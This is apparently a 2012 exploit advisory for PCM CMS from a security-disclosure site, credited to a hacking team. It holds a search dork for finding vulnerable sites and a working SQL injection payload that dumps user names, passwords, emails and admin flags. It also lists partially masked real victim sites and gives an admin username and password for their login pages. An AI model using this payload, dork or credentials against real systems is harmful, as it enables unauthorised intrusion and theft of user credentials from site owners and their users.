PCM CMS SQL Injection & Duplicate Login Vulnerability

2012.10.05
Credit: IRaNHaCK Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:get_gallery.php?id=

---------------IN THE NAME OF ALLAH----------------- Title: PCM CMS SQL Injection & Duplicate Login Vulnerability Discovered By : iranhack secrity team Vendor : http://www.pcm-nv.com/ Our Forum : http://iranhack.org/acc Exploit : localhost/get_gallery.php?id={SQL} DeMO: http://www.XXmptonsnow.com/get_gallery.php?id=-248 http://mariXXa1.com/get_gallery.php?id=7 http://huntiXXXonlandmark.com/get_gallery.php?id=428 http://www.casXXXl.com/get_gallery.php?id=195 http://www.wooXXXryhoa.org/get_gallery.php?id=449 Exploit 2 ( Duplicate Login ) : http://www.haXXXnsnow.com/login.php http://mXXXposa1.com/login.php http://huntinXXXnlandmark.com/login.php http://www.casXXXdelsol.com/login.php http://www.wooXXXuryhoa.org/login.php Username : admin / Password : 4tre$$1024 ================================================== Inject : union%20select%201,2,group_concat%28u_name,char%2858%29,char%2858%29,u_pass,char%2858%29,char%2858%29,u_email,char%2858%29,char%2858%29,u_admin_allow%29,4,5%20from%20comm_user--+ Greetz : Mr.XpR - UnknowN - FarbodEZRaeL - Samim.s - Siamak.Black - Sianor - mh1376 - Love war- AL1R3Z4 And All Iranhack Bug ResarcherS ./ IRaNHaCK

References:

http://www.pcm-nv.com/
http://iranhack.org/acc


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top